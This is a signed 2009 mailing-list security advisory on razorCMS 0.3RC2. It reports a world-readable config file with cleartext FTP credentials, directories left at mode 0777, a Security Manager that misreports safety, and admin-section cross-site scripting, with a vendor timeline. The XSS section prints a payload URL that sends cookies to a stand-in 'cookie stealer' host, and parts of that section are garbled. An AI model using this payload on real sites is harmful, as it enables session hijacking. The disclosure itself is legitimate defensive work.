-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vulnerability Disclosure for razorCMS - ---------------------------------------------- A recent security audit has uncovered multiple security vulnerabilities in the latest version (0.3RC2) and all previous versions of razorCMS CORE by Morgan Integrated Systems. From the vendor site: "razorCMS is an open source content management system written in PHP, using a flat file database structure instead of having a separate database. It has been released under the GNU General Public License." http://razorcms.co.uk, http://en.wikipedia.org/wiki/RazorCMS * The razorCMS install script sets mode 0644 on admin/core/admin_config.php, which contains the site owner's cleartext FTP credentials and a sha1sum hash of the site admin password. Any local user has access to these credentials, and the admin password can easily be cracked offline (rainbow tables, brute force, etc). The vendor is planning for the use of stronger file permissions, two-way encryption for FTP credentials, and stronger salted hashes for admin passwords in the next release (version 0.4). * razorCMS requires a laundry list of files to be mode 0777 for installation, and promises to correct these permissions after installation. The razorCMS install script leaves the following directories in mode 0777 after installation: the razorCMS root directory, the datastore/ directory, and the admin/core/ directory. The issue with this should be readily apparent to you. The vendor is considering fixing the installer in the next release. * The razorCMS Security Manager is "used to ensure apache owned files have safe permissions set." In theory, if the Security Manager detects any insecure files, it will display a warning message and instructs the user to click a button to "secure" the site. By the same token, if all files are found to be secure, the Security Manager will display "All files are currently safe." The problem is the Security Manager doesn't actually *do* anything -- it only checks the file permissions of a handful of files, and not even all of the Apache-owned files like it states. If a user were to recursively chmod the razorCMS installation to 0777 (which may be tempting for a novice user to do due to the large number of files the installer requires to be mode 0777) and then rely on the Security Manager to secure the site, nearly all files and directories would be left in mode 0777 and the Security Manager would report "All files are currently safe." The vendor does not feel that this tool is broken, just that the phrase "All files" is misleading and the wording should be changed. I have been unsuccessful in convincing the vendor that the Security Manager should *actually* secure the site, so don't expect this to be fixed. Ever. * Several cross-site scripting vulnerabilities have been discovered in the razorCMS admin section, and will be fixed for the next release: http://yoursite.com/cms/admin/?action=edit&slab=home'>
alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encode URI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.u serAgent));. The vendor has no plans to change this behaviour. Timeline: 04.06.2009 - Initial vendor notification. 04.07.2009 - Vendor dispustes vulnerabilities. 04.07.2009 - Vulnerabilities explained. 04.07.2009 - Vendor begins to implement certain fixes, refuses to fix others. 04.07.2009 - Vulnerabilities explained again. 04.07.2009 - Vendor continues to dispute some vulnerabilities. 04.15.2009 - Vendor notified for last time. 04.16.2009 - Public Disclosure. -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAknm9rQACgkQacHgESW3wZrSCQP/et6hdKAGKlYcwQ8y9zx/62knIlBm w6cUDqxh1p2CSGhu81Uep9Rgx1DEftJ+ltGl/Nfe7iwuQNB+O0Ro42w5YLKyfpn11KeP 2aEChWUnZluavMHHKpSjeIYGWrQR1b6lUfWnULheuehZH/T3xvf3yy9DPScjAEQvI1hz hXU6ua4= =anJq -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/